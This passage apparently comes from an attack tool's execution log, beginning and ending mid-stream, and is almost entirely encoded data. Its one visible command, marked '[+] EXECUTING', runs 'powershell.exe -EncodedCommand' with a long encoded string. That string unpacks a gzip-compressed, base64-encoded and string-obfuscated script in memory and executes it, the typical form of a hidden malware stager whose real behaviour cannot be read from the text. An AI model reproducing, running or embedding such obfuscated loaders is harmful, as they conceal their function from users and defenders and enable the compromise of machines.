ALwB4ADYAbgAzAEMAewAxAH0AegB5AFYAawBiADgAZABIAHcAZgBPAGMAMQB5AG0AKwBCAFIAZgBYADUASgBmAHgAOQBoAFIAYwBiAHEAawBQAGwAUwBlAEUASwA5ADMAMgByAGoANgBqAGgAMQBHAHgASQBGAHcAcwBZAGgAawByADUAbgA1AHQAZQBDADgAQgAvAFMAZgAyAEMANgBPADQAdwBHADgATQBjAFkAJwArACcAZgA0AHQAMABsAGUAWQBjADQAeABJADcAQwA5ADUAWQA0AFQAWAA0AHgAdgBtAGYAbQBPAC8AUABVAGsAUABYAG0AUgBkAGwAcAB4ADcAcQBjAHYASwBqADYASQBOAFcAdABuACsARQBGADIAYwBuAHIAUwB1AFQAcABWAGQAegBUADQAQgAvAGgALwBWAHcAUAAvAEgASgBlAGgAYQBkADAAegBxAFoATQBkAGUAagBNAGQAVQBlAE4ALwBIAGYAZwB5AEgAbABHACcAKwAnAGUAdQAzAEkAbwAzAHIATwBYAHsAMgB9AGUAWgB2ADUANQBiAG4AcQA1AHMAcgAxAHIAMwBDAFIAZgB5ADIAeQBWADQAVgBMADMAMQBaAEQAMQBEAE8ARQAzACsALwBKAEQATwAxAGUAKwA1ADgANgAvAHoAcwBlAHoAMQBEAFAANwAzAFoAYwBwAFQAeQBpADgAUAA1AEQAUAB4ADUATwB7ADEAfQB0ADMAJwArACcAcgBmAHcAdABlAHkAeAB3AGoAOABEADQAMgBsAGkALwA3AGgATwB1AEMASQBPAEgANgBpAGoAWgBxADUAVABmAE0AOABWADkANQBSAE4ANABtAC8AaABkAHMAegArAEgAZgBWAFkARAAxADYASQBDADMAQwBuAFoAMABNAGMATwBnAC8ASwAvAGkAbgAvAFYATgB7ADIAfQBOAHoAdgA5AGIAOAA1AGoAaQBDAC8AeQBwAG4AcQBuAEkARQB5ADkANQBxACsATAArAEcALwB5AHIALwBQAGEAewAxAH0ASABHAE4ANAB7ADIAfQBmAEUAdAB2AFgAcAB0AEgAOQBEAGoAbgBCAEoALwBwAGIAcgBtAHQAKwB1AHsAMgB9AFUAbgA1AFYAdgBiAFUAcQA4AFgAdgBKAFAAYwA2ADcARQAvAFAAVgBrAEwAaAAwAFgAYgA2AEIARAA4AFcAUABhAC8AcwAxAHUATwA4ADcAZQBvADUAYwBYAHoAcQAnACsAJwBQADMAWQBIAEwAcwA1ADEARwAxAEsAMQA5ACsAewAxAH0ARwArAGQAWAArAFIASQA0AC8AcwBWAHUARwAvAHsAMQB9ACcAKwAnAG4AMgBFAC8AegAxADIAegA0ADIATABpAGYAbQBMAC8AcQBkAHYAMwBEAHgAagBoADUAbgByADMAQgBOADgATwBjAEgAZgA0ADMAKwBwAEIANABoADcAMgBWAGQAOABNAGMAYgBmADAAbQBkAHUAZgA5AHUAdQBUACsAZwAxAGgAeABkAGQAWAArAG8AKwArAFgAOQBMAG4AUABYAGgAcwBlAFQAbgBOAFgAVwBEADgARABZAEcAegAvAHAALwAyAGMAcQB4AGgAaQBlADEAYgB3AG8ATwBsAGYAYwBMADEAdwBYAFcAKwB3ADUAYwA3AGMAdgBrAHgANwAzAHYATwAzAEgAdQBQADYAZwBUAEQALwBnAHYAYwA3ADMAVQA1AGsAZgBaAE4AZgBIAFYAcABlAHYAUgBVAHYANgBXADMAcABPAFgALwB3AHMAMwBuADEAeAB2ADUANQB5ADcAZwBSAGQAMAB6ADgARwA4AFgASABDAGYANAAyAFAAdgB2AG0AYwBIAGoAOQB5AEQAZAA4ACcAKwAnAFgAcABCAFgAYQAvAGMAZgAxAE4ASAB7ADIAfQBvAHYASwB7ADEAfQA2AE4AVwAvAGgARQBmAEUAYgBjAGcAeABmADAAcgB4AE4AdgBMAGUAdABVAHIANgA5AGYANwArACsAQgA0ADYAMwB6AG0AdQBQAG0ASABqADAAbQA0AEYATAB5AHkAQwA3AFgAeABpAFYAeQBVAEsALwBSAEIANQB6ADUATwB0AFgARgB4AHMAKwBhAHYASwBCADgAbABYAGoARQArAEwAJwArACcAKwBrAHoAaABzAFQAYgAvAHEAOQBnAEMAZQBWAHIAKwBUAFgATwAzAGgAMABYAEsAYgA2AFMAUABHAGEAdgBmAEsALwArAGkAdgBIAHkAeQBMAEYAagBlAHkANgB3ADMANwBpAHQAewAyAH0AMQB5ADAAewAxAH0AOAAwADkARwBGAEgANwByADMAagAvAGkAWAA4AEoAYgAvAHAAZgBjAHoAKwBoAGUAdQBxAGsAOQBhAEQAdgB5AE4AeABNAGsAUwBlAEwAWABqAHAAMgAzADUAOQA3AHAAJwArACcAMwBCAGwAMQBwAFgAVQBEAC8AMwBoAC8AeABlAHQAWAAxAHoAYgBoADQAMQByAHcAdwA1AC8AeABwACsATgBjAC8ASQBQAGsAdgB6AHkAdwA1ADkASABNAC8AYgBTAFAAbgBaAHUATgBNADUASgBYAEoAcAB2ADgANgA5AHMAbAAxACcAKwAnAGQAeAB3ADgAVABYADAAdQBlAGoAZgAzAFUAUwBYAFoAewAyAH0AbgBsADcAVABUAHoAcQArAHEAZQB1AE8ANABPAHsAMQB9AFcAUABCAGIATwBzADYANQA3AGIAbgBqAGYATwBNADgANQBMAG0AZQBzAFcAJwArACcAOQBNADMAQwB7ADIAfQBkADcAZQBLAEQAdgBQAEgAawBOADMAJwArACcAMgB5AEkAZgA5ADEAZgB3AGIAdABuAGYAcwBqAE4AOQA1ADkAZABWADgAewAxAH0AegBzAHYAKwBoAFAAdQBjAG4ANAByADQAaQBEAHEANwBKAFQAegB2AGIASwBlAEMASABoAGYAdABhADUAOABrADYANABaADYAOAAzAEsAUgArAFQAWABKADYAbgAvAEIAKwAxAGYAYQBOAEoAZgBGAHcAOAA4AHIAcgBIAGYAeQAwAFIARwA3ADMANgBkAHsAMgB9ADEAZABVAHoAYgAvAGsAbAA0AGMAUgAyADQAewAyAH0ASgArAGsAMQB5AFQAeABkAEYAcwBQAHUASAAnACsAJwA3AEgAZgB1AEMAawB4AFUAZgBmADkAZABJAE4AOQB3AGgAWABHAC8AQwAvADkAagA3ADAAewAyAH0AVgA3AGIAOAA1AEsAOAB1AEsARAAnACsAJwBQAEkARQA2AEQAdgByAHYARwAzAGwALwBSADkAMABEACsAawBkADAAbQA1AGcASABYAGMAYwA1ADMAYwArAHAAOAByAGQAUAB2AHQAKwA3AFgAZwBqADcAMwBTAEQAegArAGQAaAAxAEQAUAB7ADEAfQBsAHYAdwB1AEUAVgBlAGcAaABuAHMAOQB7ADIAfQB2AGsAaAA5AGMASAB6AHcAVAAnACsAJwBKADkAWgBQAGUAawAzAGQAWAA1ADcAZwBKADkAYwBKAGgAZgBPAGUANwBmAG8ARgBYAEsAeQBJAGQALwBwAGkAOABKAGUANwBYAHoANwBIADQAeAB3ADUAWgBOADgARgA1ACcAKwAnAHkAbABQAGwAdQB7ADIAfQBIADgAVgBHAHEATQAxAHcAUAAxAGQAagBuAGwAbgBpAGEAdAAvAGIAZgB2AHYAewAxAH0AaQBjAHgALwBpAGkAMwBwAHgAaQBCADQAZgBzAEkALwByAHIAVAA3ADkATwB2AFoAcQAnACsAJwA3AFoAdQA1AGIANQBqAGcAOQA1AEgAagBxAFkASgBuAE4AKwB7ADIAfQBCADIAZQBXAHEANQBTAEgAWAA5AFgAUAB5AEIASAAwAHEAKwBGAEwAKwBuAE4AdgAvAHoASABNAFUARgArAEQAYwA5AFgAbABnAEYAOAA5AFAAVQBsAHcAdABVAGwAMwBiAHMAeAAwADcAMgBIADkARABQAEUAcAB2ADQAMABMADYATABsADMAUAB3AFAALwBVAGsAYwA1ADMAagBmAE0AewAyAH0ALwBqAG4AagBWADMAeQAyAGcASAArAFYAZAB3AHIAcQBOAGIAMAB2AHcAYgAzAGsATwBJAEMAcgBsADcANgB2AGcAOQB6AE8AYQAwAHYAeQBWADAAYgA5AGsAdgBMAFcATgBoAEwAdgBUAE8AaABmAFYASQArAGQAOAA5AFMATQAvAEQARQB3AGYAMwB4AEgAMwByAEgAcgB6AGgAbwA4AFgAeABMADMAYwAvAEoAdgA3AGoAcQAnACsAJwB0AFIASwA2ADUAKwBkAGkAOAA4AFoAMwB6AFAAVQA5AFIAMwBwAHUAYQAvADQAdgBFAGgANwBuAFAAZQAzAGEAOAAxAE8AeQByADQAewAyAH0AMwAzAFQAMQBQADIANgBmAGQARgAvAFcAWQBPAHsAMQB9AGsANwBnAE8AOABYAEIAYQB6ACsARQAzAE8ANgBmAHIAagBqAGYAZgBQAFIALwArAHgAYgB5AGgAdgBtAGUAKwB7ADEAfQBqACcAKwAnAHoAMgBNAEYAeAA0AFQAeQBVAEkALwBjAGsAawBuADIAbgA1AHMARgBJAC8AQwAzACsAbQBSAEwAbgAyAGwAOQA1AFgAbABDAGsAUABpAFMAMwBIADcAKwB7ADEAfQBhADgAbABaAHMAVwAvAHAAKwBvAHgANQBWAFYAaQBPAGMAWgBQADYAaABCAGwAMQB7ADIAfQBxAC8AbABCAGYAbgBUAGUAUgBiAGMASQBrACsAYQBHAC8AVgBTADMANQBWAHcATgBEAGQAdQBQAGQAOABvADIAMwByAEIAKwBMAGMAOQBaAGYAKwBkADgALwBnAE8AdgBUAHAAdABQADcAWgAwAEgAVQBNAC8AMgBTAE8AdQBrAEsAOQBJAC8AaABJAGYATABwAGkATAA1AE8ANgBiAC8ANwBpAE8AcgA3AEYALwBEAFkAKwA2AFQAcAA5ADQAZgB1AEUANQB5AHcAWABuAG0AMQBkADUAdQB0ADUAbwA0AHsAMQB9ADMAUABwAHoAeQBuAE0AcQA4AFIAVAB6AFcAOABXACsATAAzAGIAVgB0AFgASAB0AHcAbgBtACcAKwAnAFoAZAA2AGIAWgArAGIAbwA3AGYAcgA2AFoAdwA1AFIAcABwAGoAcABYAGwAZwAzAGMAcABIAGYAWgBqAHEAdgBpADIAOABvAFgAUABkAEoAdwBnAHYAZQAvAEsARwAvAEQAVAB4AGYASABJAEkAWAB6ADIAMQArAFgAZABnAFgAbQBkACsATwBIAEMAZABsAEIAdABYADkASgBHAEQAdQB1AFgAdgBHAHIAdQBWADQASwBiAHkAdgBtAEQAOQBzACsAdgB6AEoAdABVAGoAQgBmAFgAWgBpADkAMgBDAGYAUABTAEgALwBZAFgAbgBFAGkAZgBpADYATgB5AFgASABGADEALwB1AFUANgBpAC8ANgBHACcAKwAnAGYATABkAHAAOAAyADUAQgB2AFYAaQAwAGYAZgBqAFcAUABZAGwALwBxAG0AagBMAGgAVgBIAGwANAA1AG4ANwBZAGMAKwBrAGgAOQBjAFUAVgA4AHEAdAArACsAMgBGAGUAZQBNAHQAbgA5AEgAbgBJADAAWAAnACsAJwBPADkAMQBDAEYAKwB0AC8AUgBiAG0AZgBIAHgAbQAvAHUASwBNAHYAVwBuAFMAOQBkAC8ANQBxAEgAegAvAGgAKwB0AC8AMwAvAEIAZwB4AE4ANABVAFgAYgBZAHcAawB1AFoAKwA1AHMAMQBjAFQAbQBoAEwAegB6AHoAWgBPADYANQAzAC8AdABVAEwAegBOAHYAZABuAC8AWQBvAFUANABZAEUANgBmAHAAKwBaAG4AbgB1AHMAWABqAHoASABuAGQAYwA5AE8ATABOAEMAZAAnACsAJwBVADMAawBqADUANQA3AE4AeAA2AHoAegBsAE8AbgBGAEYAbgBUAEQAMQBQAEcAagBIAGYAUABVAEgAZQBOAGwANwByAHUAQwA1AHkAaQBQAG4ATABaAEQARABkAFUAVQBZAEYAegB2ADYAWQAvAHEARABPAHYASABDAGsAagBsAEkAMwAzADMAWABFAFQAbQBXADIARAAzAE4AOQBWADMAMwA3AE8ARwBiAGwASwA5ACsARwB7ADEAfQAvAHUAagB4AGIAMAA5AGUAYQB4AFUAWgBQAHEANwB6AEUAOAAyAG4AZgA5ADIAMwBoAHUAQgBtADQAbAByAC8AUgAyAFgAYgBSAG0AYgBrAGMAOQBTADkAMwBSAE0ANwA3AE8AZABuADAARQBIADUANQAvAGkANQBjAFcAeABEAHYANQB4AGIAeABWAGcASQBjADcANAAnACsAJwA4AEwAOQAxAGwAJwArACcAVwBhAFkAMgBmAEUASABmAE8ATABFAC8AZgBkADIAQgA3AFkAOQBjADAAYwBkAGUANwA2AG8AawB4ADgAbQBaAHQAUABTACsAeABTAHUASAA0AGsASAB5AGYALwBWADkAYgBmADgAcwAzAHsAMgB9AGMAOABuADgAWgBPAEMAKwB2ADgASQBQAFUAKwBjAGQAegAxAGYAWAAyAEgARgBzAC8AegBmAHMAMgA0AHsAMQB9AEgAeAAwAG4AdQBlAGUATgB2ADkARQBoADUAMQBuAEgAcAAnACsAJwB1AGUAeQBzAHQAWABmAGEAUgAxADAAbQArAFoAUgBmAGkAagBMAGwAeQAwADAANwBSAHkAagB0ADMAMQAzAHEALwA0AGsAWAA2AGoAagB4ADMAdAB6ACsAMgA2AEgASABQAFgARQArAG8AMAA0AFMAMwBxAGEAdQBoADcAegArAEMAZgBuAEcAKwBDAHYATgBuAFQATAA0AHcAdgBrADEAZgBYAC8ANAA0AG4AcQBXAGUAcAA1ADYAeABIADMAawBFAFQAawA4AHIANQBsAEgAbQB2AGYAUAA0AGEAdQBYAE8AdQAyAEUALwA3AC8AQgB4ACsATABEAEMAKwByAEsARgBmAFAAYgAzAFAAVgAwAGcAMwAxAGMAZAB3ADcAZQB6AEIARwBvAGIAKwBTAHYAcwBlAHUAQgBoAHIAcgBpAFMARgAwAHcAewAyAH0AdQA2AFgATwByADAAawBqAG4ALwBaAEwAbwA0AHoANQArAE8AdgB4AE0AZQBLAE8AYQBYAHMAbQB1AHIAWgBJAC8AcAA3AC8AdQBlACsAcgA4ADgAOAAnACsAJwBWAFAARgBDAEgAMABFAGQAbgBPAHEAZABoADMAWgArADkAWgA0ADQARgBTADkAKwBjAGYALwB2AE8AcgBmAGkAbgBoAEgAeABzAFgAZQAvAGEAagA1ACsAVAAxAHgANgBUAHAAUABxAHQAdwAvADQAWQBXAHYANQBtAEIAdgBKAGYAdgBMAC8AdQBIADQAagA3ADgAewAxAH0AOABQAEQAUwArAE8AewAxAH0ALwBlAGkANQBTAFAAcAB0AFIATgB2AFUAWABMAFIAeAAxADQALwBxAG0AdABvADgAcQBXAGoALwB2AFkANQA2AFoASgA5AGEARgA1AFUAUAAvADMAWABEAGUAbgBqADAAbAA5AGsALwBPAE8ALwBEAEUAMQBEAG8AZgBJAGQAKwBuADUAcgB2AHMAUwA5AHoAMABqAHoAegAvADgAbgBjAEgAegB2ADgAdgBYAHUAdQBrAGoAdQBQADAARwBQAGoAeQBuAHoAOQB6AC8ALwBlAEwAOAA4AC8AZQBhAGkAWABuAEwALwBlAFkAegBkAGkANgBiAE4ATQBjAFoAMABZAGYAUwAxAHoAQgBuAHkAaAAzAG4AQwArAHkAOQBvAFcAOQBKAC8ARgBDACsAegBpAFgAcABGACsAawBIAFMAdgBMAEUARABYAEcAZgAnACsAJwA1AHUANgBlAHkAOQB5ADIAMwAwACcAKwAnAGYAbQAvAGgANwBnAHYAdAA5AHoAZwB0AHMAMAA1ADAALwA5AHIALwBaADkAcwAxADIAYwBqADEAMQBuAEQAOAB4AGYAKwBKACcAKwAnAG4AOABYADYAZQA4AHMAVwBIAHUAewAyAH0AVgAzAGkAKwBQAFcAYwBzAGUAZgB2AEUANQA3AFQAWgAvAEIAWAB7ADIAfQA1AHcAcwBIAEgAZgBHADgALwBNAHIAYgBwAHUAVQBEAC8AdQB1AE0ANwArAG4ANwAyAEoAcABMAGoAeABEAHYAdwBGAHoASgBmAGsAegBLAHgATQBPAEoAJwArACcASwBmAGsANgBZAEwAWABOAFgAVgBlADUAbgBpAHYAaQBOAFAAMAAvAGMAegB6AEMAYwA4AGoAWgBzAHsAMgB9AE4ALwBUAEwAZgBSAGYAVABjAFkAcgBjAFgAbgBKAHoAeABYAFkASAByAE8AJwArACcALwBNAEMANgAzACcAKwAnAFQAdQBwAEUAeAA2AEwAUAB3ADkAYQA0AGQAZQA3AGwAZQBtADEATQBIAE0AZgA4AGoASAB6AGcAUAB3ADcAaQBuAE4AegArAEQAOQBKAG4AMwB2AEcAYwBIAHIAOAB1ACsAMgByAFQATgBYADgARQBGAG0AMwBPAFgAbQBhAC8AYwBIAHgAcgBYAG4AVABvAFgAegB7ADIAfQA1ADMAaQBPAHIAZgBmADcAdAB2ACcAKwAnADgAZgBFADgAOABUADQAJwArACcAbgBMAE4ALwBJAG0AdgB2AFkAOABiAGsAUgBjAHoANgBtAGIAVQBuADYANwB7ADIAfQB0ADQAVQBKAC8AJwArACcANABlAGUAdQBGADUAUwBaAFAANgB6AGkAWAB6AHsAMQB9ADMAOQBuAGEAdQBkADYAOQByAHYAcgAxAEsAWABqAHEAawB6AHoAbgBmAG4AcgBuAE8AewAyAH0AQgBlAHsAMgB9AC8AdAAvAEgARwBKAHYAbABtAGQANwBEADQAewAxAH0AbgA5AGoARgBlAGoAbgBQAGIAZgA0AEYANQAxAFcAYQBCAC8AUABkAGkAagBpAG4ARABtADMAeAA3AGYAdgA3AG4AbQBzADUAYgA1ADMANQBxAFAAQwBjAEwAMAB2AGYAdQArAGcANwBQAE8AYwBoAC8AcwBEADEAawBmAHgALwA2AGUAKwA5AHgAbABsAEIAWABIADgAdwBmAHgATQB2AC8AVwBIAGEAbgAvAGgAcAA1AEQAawAzACsAYgBUAG4ANwA3AHUAWAB4AHEASAA3AHEAbwA4AHAAagAvAGEAWgBMADQAZgBuADkAdQAvACsAOQBtAC8AdgBGAG8AKwBIAGgAMwBmAC8AOABVACsAcABNAEsASQA5AGcAUgA4AHsAMQB9AHsAMQB9AHsAMQB9AHsAMAB9AHsAMAB9ACcAKQAtAGYAJwA9ACcALAAnAEEAJwAsACcAUQAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None +[+] - Bytes remaining: 6260 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEYAbQA4AEkAVwAnACsAJwBrAEMAQQA0AFcAWQBUADMAUABhAFcAaABMAEYAdgA4AHIAcwBNAGwAUAAxAEYAdgA2AGIAOABYAHQAVgBzADIAZwBGAEEAUQA0AFcAUgBBAFoAewAyAH0AeABOAFEAcwBNAEQAewAyAH0ANgBEAHIAWgBKADcATQBSAHkALwBPAG4AbgAvAE0ANABWAHoAdABzAE4ARwA1AFcARQBkAEcALwAzADYAZABPAG4AdQArACsALwA4ADQAZgBuADIAOABmADkAdwAvADMAMgA0AGYAdAAvAC8AdgBoAGoAdQB2ADMAKwBsAHcAZgB6ADEAZQBQAHQANgB1AFoAdQArAC8AZAAzAFIALwBxAGQAagBEADQAMgAyAFMAbwArAGYAMwBqADMAMgA3AHQATgBtAGYAMAB6AGUAcABmAHgAMwB6AHsAMQB9AE8AbwBsAC8AJwArACcARwBkAFIAUABuAE0AWABpAHsAJwArACcAMQB9AGMAWgBuAGwAawBUAGQAUgBSAEQAYQBQAFkAUgAzAFgAWgBYAFkAYQAvAFYAMQBjAHQAWABxAHYAdAA0ADUAeABaAEwATQBZADUATABGAHMAcwBwAFAAbwByACsATgBqAEcANAAvAHgAWQBSADIATAB5AE8ANQBqADAATQBTAHkAegBIADYAeQA3AGcAMwAvADkANABxAG8AdgBPADUAUgBGAEUAMQAyAEYAWQBNAHoAbgBuACsATgBRAGEASAA5AHMAbAAwAE0AeQBsAGcAMQAyAFEALwBXAFcANwBEAHYAYwB7ADIAfQAvAHoATQBsADUAagBXAE0AUwBtACcAKwAnAGkAVABiADYAKwA1AGgAdwAzADYAdQBpAGkAdQB3ADEAOABrAHIAUABzADQAKwBSADcAMABMADIAVAB5AEoAdgBZADkAdgBHAHoAeABnAGUAeABUAFQAaQBMAEEAYQBYAHIATgBkAGoAbgAxAFYAawBpACsAagBsAGYARgAnACsAJwBkAGoALwA2AGoATgB7ADEAfQB0AGEAOQBqAHUAeAA5AEQAQwA1AGkAagB0ADMAOQB5ADkAaQB5AC8AegBDAFgAZgA5AG0ASQArADMASABEAGUAdgBpAHQAOQBZAFoAbAAzAEwARABPAG8ASQA2AHkAbABkADgAZgBMAG4AUwB2ADUAeAArAGUAWQBoAFAAeQBRACsAKwBOAEcAOQBrAHgARABQAFkANQBqAGMARQBlAC8ASAA1AEUAcgA1AFkAOQB3AGsASAByAHoAcgB4AHUAaQBYAC8AUAA0AEwAZQBOAHIASQAzAGgATwBwAGEAUgAzAGMAVgBRAE8ATABNAFAAZgBrAFUAOAA4ADMAMwBkAFoAUABzAFkANwBtAEwAUgB5AEUANwBaAHIAegBoAGMAZAB2AEUANABKAGoANwB6AFYAcgBqAGwAewAyAH0AWABqAFgAKwB7ADEAfQBGADEAZAA5AEUATAA3AEoASQAvAEYAZgA3AGQARQA1AGMAYgA4AEEAUwBIAGwAbgBVAHYAKwBQADQATwBmADYAbwBtAHUAOABYACsAcwBwAFMAZgB1AHEANQBMAC8AQwBpAHcAKwB5ADQARwBPADUANAAvAFkAOQBjAEcASABQAFcALwB2AGoAOABEAFoANgAyADcANQA3AHAAcwBzAHkAZgA3ADEAMgBwADkANwBUAHYAeAA5ACsAdQBZAEUAdQBkACsAJwArACcARQBmAFAASQB7ADIAfQB0AEYAdgB3AFAAdgBaADYAegBhAHsAMQB9AG4ALwB3AFMAWAAxAHIAdwBXAGoAZgBaAG4AKwBDAGgAZgBWADkAWgBYADMAaQBVADgARwBIAHAAOQB5ADUANAByAHcAQQBuAHgAZQArAFIAZgBZAHEASQBFAC8AOQBmAHkAaAA3AHgAbwBXADYAegBQAHUAdgBJAG4AeABIAGYARgA2AFcAdQA0AGwAcwBWADgAaQBjAC8AaQArAHQAVwBkAG0AcAAvAHIAZgA4AHQAKwBoAEcAcgBrAHYAWABNADEAMQAnACsAJwB2ADQAcAAnACsAJwBUAGkAZQB3AEwAcwBaAGMAZAB7ADEAfQA5AGMASgA0AFQAOQA0AG4AdABMAHUASAA1AEMAOQAvAE4ASQA0ADcAdABmADIAUgBUACsAQwBmAC8AVAByAGwAdQB6AFUAZgB6AG8AZwBZAHYAOABlAFkAegB1AEUANABiAHgAVQBuAHIAQwB2AGMAcAA5AG0AawA5ADcAeQB2AC8AUABzAFcAdwBFAHEAOQBsAHQAOQBaADMAMwBnAGcAMwBmAFgAYwB7ADEAfQBQADgAUwBUAFcAKwA1AG4AegBwAE0AcQBpAGwAWQA0AHcAUgBOADQAMgBkAHYAewAyAH0AaAB4AGEALwBSAHIAeQBmACsASABOAE0ALwBHAHQANABJADcALwByAE4AaAA2AHcAOAAyAE8AcgBmAGMAVQBUADgAZgBBAGIATwBNAHEATwBFACsAeABWAG4AagAnACsAJwBpAC8AYgB4AHIANQBJAHgANwBMAGoAawAvAGMARgA4ADcAWABpAHIAeAA1AEoAUAA5AHEAKwBOAEkAagBYAGcAJwArACcAZABkAFUASgB6AHkASQAzAEEAOQAnACsAJwBJAGQALwBrADMAegAxADgAMgByAEoATwBmAGsARQA4AHgAdAB6AEwAbgAyAGYAVwBHAGIAVgBoAGYANQBRADMANQArAEMAbgB1AEwAKwB3AG4AdQBKAFIAUgByADUATwArAFMARwBlAHkANAA1AEgAcgB1AE0AMgBNACsAKwBsAEoAeQB2AHMAYwBoADUATABSADAAYgA0AG8AMwB5AFcAYgBqAHoARAA5AHcAbgByAGsAVwBjAGwAKwByAEgAVAArADgASgBmADYAOAB1AC8AegA5AEYAcgBpAHsAMQB9AGYAeQB1AGMAWABQAFkAMwBoAFkATwBZADgAewAxAH0AOABQAHIASgBlADcAbwAvADQASABQAEwAUAB0AHsAMQB9AGQAbwB4AGkAYQBOADcAOQBIAHYAZwBmAFAARwBYAHoAUgBlAHYAZgBFAFQANwB4AC8ASQByADYAewAxAH0AOAA2AG4AZgBhAC8AUwBlADEAcgAyAEMAVgAvAEMAJwArACcAdwB6AFkAYgA0AHYAOABDAFAAdwBWAHAANQBvAGEAdgArAFgANABOADMALwBwAFQAOAAwAFgANABMADgAeABFACsAWgBkACsAZAB2ADgANQBuADgAVAA3AGcATQBiAG8AagB2AC8AUwArAGMATQAzAFEAcgBUAFgAMgA4AHgAMAA0AGEAegAzAGwAKwBRAC8AOABuAGMASABmAEEAeQA3AEMAdQBRAFEAMwAvAGIAOQB5AG4AZwBaACsAZgBNAFMAUABTAFMAUwBlAFQATQBDAG4AWgB6AHgAZgB3AFAARwBtAEoAWAArAGsAeQB5AEYALwA4AE4AZAAyAHIAUABsAHUAMgB2AEYAcABqAG4AMQByADQANwAzAEQAegBoAE4AdwBHAHEATgA3ADUAewAyAH0ARgA1AEkANwA5AHIAOQBGAGoANgBOADAAVQAzADUATQBjAFkASABtAG4AZABHADUANAByAHoAbABmAG8AawB2ADcAZgBsAHQAawBMAHYATABrAHAAdABhAC8AaQBvACsAYwBQADcARABPAEMAewAyAH0ANwAwAHkANgBaAEwAcwAxAHYAZABmADAAewAyAH0AUAB4ADgAQwBYAHAAJwArACcATQB2AHkAMwA3AGwAUwAyAGoANgB2ADQAdABBAEUAbgA1AFkAOQAwADEATAB6AHkAUAB1AFIAeAB7ADEAfQBkAHkAMQAzAHEAagBUAEEAKwBuAFQATQB6AHkANABRAHQAZABsAC8AOQByADcATgBlAGoAUgBMAGQAOQB0AC8AJwArACcASAA3AHsAMgB9AHUAcABmAEoARAAzAEMAdQBxAFUAZABIADEAaQBIAHMAawByADYAcwB5AFEAdgB4AGMAdQB0ADgAegA5AEgANQBnAGoAeABVAFgAYQBtADcAZgAnACsAJwBEAEUAKwBjADMAewAyAH0ANgA0ADIAcwB7ADIAfQBmAHEAZgA0AHAAWABXAC8ASgA1ADcAcABQAGUAVwBaADgAdQAyACcAKwAnAGMAZQBJADMATgAwADQAcgBuAFoAOAA3AFAAJwArACcAewAyAH0AbgAyADcAUgBEACsAVABEAGcAWAAxAFYAZAArAFQAUgA0AHIAZgB7ADIAfQBMADAAYgBXAEUAZQBHADkAcQBjAGsANwA2AHgAagByADgAUgBqAFQAQwBXAEgAcgArAGoAegB3AFAAbQB4AHgASQA4ADUAKwBlADgAOAAwAEgAdgBrAEQAWABVAHYANgBVAGQAcAAvAFEAbgB4AEwAZQBGAFEAawBWACsAewAxAH0AeAB5AFgANwB6AGUARwBOACsATABnAGsAYgA0AGYAbQA0AHgAWAA0AFYAYQA0AHIARABUAHAAWQB1AFAANgBSAGQAdwBjAGMAZQB0AFkAcgA0ADEAUABBAGgANQA3AHoAcABPAFQAKwA2AGwAQQB2AFcALwBSAEEAKwBEAGwAUABEAG4AbABIAGYAcQBuAGUAeQBOADkAcgA4AGsAZwA0AEwANwB7ADIAfQBMAGYAdAB6AFEAagArAGoALwBHAHAAMQBWAEgARwBiAHcAcABNADkAKwA0AEwAcgBEAC8AbgB2ADAAZABvADYATwBpAHoAKwBiAFMASABqAFAAeQBRACcAKwAnAFAAWgBWAFoAUAAzAHcAawBGAHgAYwBKADMAYgBFAGoAZgBGAFoAOQBaAFEAWgAzAHsAMQB9ACsASAAvAEQAZQBHAFAAdQBHADcAbABzAHUAbwAwADkAZABBAG4AOQBmAEgALwBGAC8AUQAvADEAUgAnACsAJwBYAGcAagAvADMASABVAHkAMABNAFUAYwBYAGYAegB7ADEAfQBlAHoAUABxAGUAYgArAEwAbQAzAGgAYQB0AHsAMQB9AGwAJwArACcAUABVAFYAeQBHACsATAAwAGgAVAB3ADcAKwB7ADEAfQBrADUAYQA1ADAALwA3AEgAZAB7ADEAfQBYAC8AQwBMAHAAcAByADYAVAB2AGEANwB2AE0AMwBDAGkAbgBzAEgAbgAzAEgAbAB6AFIAaAAxADMAUAA1AEQAcQBtAFAAJwArACcAWAA2ADAARwAvAE4ANABiAE8AKwBuADgAQQBMADIAYQBHADQAdQB7ADIAfQAvAFkAWQAnACsAJwBNAC8AQQA5AFgARQBDAFQAdwBwAHcAbwBvADcAWgBmACsAMABUAHUAawA5ADEAKwBZAFIAOQByAGoAdAA3AEQAMwBvAHgAUgBRAGMAVQBkACsAdABTAHoALwAzAEEAdQBlAE4AbwAzAGEAagBoAHcAVAAyADQAaQAyADgAUAA4AEMAagBwAHoAWgBvADQAdgAnACsAJwBuAEQAZABsAEcAbQAvAGoAZgBXAG8AeABlADgAUgAvAFkAJwArACcAegA3AEEAewAxAH0AMAAzAHAAMgA0AGQAOABrAFkANgBJAFIAdwArAGcAMwArAEYARAB1AFMAMQA2AG8AcgA0ADMALwBmAC8AWgA5AFMAWABNAGYAMwBMADAAUAByAHgAMQBNAFYAbABpAFQAMQByADgAdQBEAHcAMwBQAG0AaAArAEgAOQB3AG4ANwBNAEUANwA3AEgANQA0AHoAeAA0AEkAbQA3AHkAOAA0AHYAcgBlAEoAewAyAH0AdgB7ADIAfQBUAHEANwBBADEAZgB4ADQAcgBTAHIAbQAxADEAOABVADkA